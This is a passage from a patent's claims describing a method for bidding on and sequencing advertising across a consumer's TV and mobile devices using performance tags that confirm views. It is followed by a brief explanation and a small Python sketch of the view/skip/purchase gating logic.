receiving a pricepoint and one or more campaign descriptions from an advertiser, wherein each of the campaign descriptions comprises a schedule for sequential delivery of one or more items of advertising content across two or more devices accessed by a consumer, wherein the devices include a TV and one or more mobile devices, and a target audience, wherein the target audience is defined by one or more demographic factors selected from: age range, gender, and location; defining a pool of consumers based on a graph of consumer properties, wherein the graph contains information about the devices used by each consumer, demographic data on each consumer and similarities between pairs of consumers, and wherein the pool of consumers comprises consumers having at least a threshold similarity to a member of the target audience; receiving a list of inventory from one or more content providers, wherein the list of inventory comprises one or more segments for TV and online; identifying one or more advertising targets, wherein each of the one or more advertising targets comprises a sequence of slots consistent with one or more of the campaign descriptions, and an overall cost consistent with the pricepoint; allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets based on the inventory; for each slot in the sequence of slots, making a bid on the slot consistent with the pricepoint; for a first slot where a bid is a winning bid:
instructing a first content provider to deliver a first item of advertising content in the first slot and a first performance tag to the pool of consumers on a first device;
receiving a first datum from the first performance tag to validate whether a particular consumer viewed the first item of advertising content on the first device; and
depending on the first datum, for a second slot where a bid is a winning bid, instructing a second content provider to deliver a second item of advertising content in the second slot and a second performance tag to the particular consumer on a second device, wherein at least one of the first device and the second device is a TV;
receiving a second datum from the second performance tag to validate whether a particular consumer viewed the second item of advertising content on the second device; and
applying a machine learning technique to the first and second performance tags, in order to improve the allocating the advertising content of the one or more campaign descriptions to the one or more advertising targets. 11. A method of controlling sequential delivery of cross-screen advertising content to a consumer, the method comprising:
determining that the consumer is a member of a target audience; identifying a first and second device accessible to the consumer; receiving instructions for placement of a first and second item of advertising content on the first and second device, consistent with an advertising budget and the target audience; causing a first media conduit to deliver the first item of advertising content to the first device; and when the first item of advertising content has been viewed by the consumer, causing a second media conduit to deliver the second item of advertising content to the second device, wherein the first and second device comprise a TV and a mobile device. | 2,400 |
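The sequencing rule running through claims 1-11 above is a gate: the next item of advertising content goes to the consumer's next device only after a performance tag confirms the previous item was viewed (claim 4), was not skipped (claim 6), and did not already lead to a purchase (claim 7). A minimal sketch of that gating, with class and field names as illustrative assumptions:

```python
# Sketch of the sequential-delivery gate in claims 1-11. The PerformanceTag
# fields mirror the first datum the claims describe; names are assumptions.
from dataclasses import dataclass

@dataclass
class PerformanceTag:
    viewed: bool
    skipped: bool = False
    purchased: bool = False

def next_ad_allowed(tag: PerformanceTag) -> bool:
    """Claims 4, 6, 7: gate delivery of the next item in the sequence."""
    return tag.viewed and not tag.skipped and not tag.purchased

def deliver_sequence(devices: list, tags: list) -> list:
    """Deliver items in order across devices, stopping when the gate fails."""
    delivered = []
    for device, tag in zip(devices, tags):
        delivered.append(device)
        if not next_ad_allowed(tag):
            break  # do not deliver the rest of the narrative
    return delivered

tags = [PerformanceTag(viewed=True),
        PerformanceTag(viewed=True, purchased=True),
        PerformanceTag(viewed=True)]
print(deliver_sequence(["TV", "mobile", "desktop"], tags))  # → ['TV', 'mobile']
```

The real method also ties each delivery to a winning bid on a slot and, per claim 9, can re-route to a TV slot when gross rating points fall short; both would wrap this gate rather than replace it.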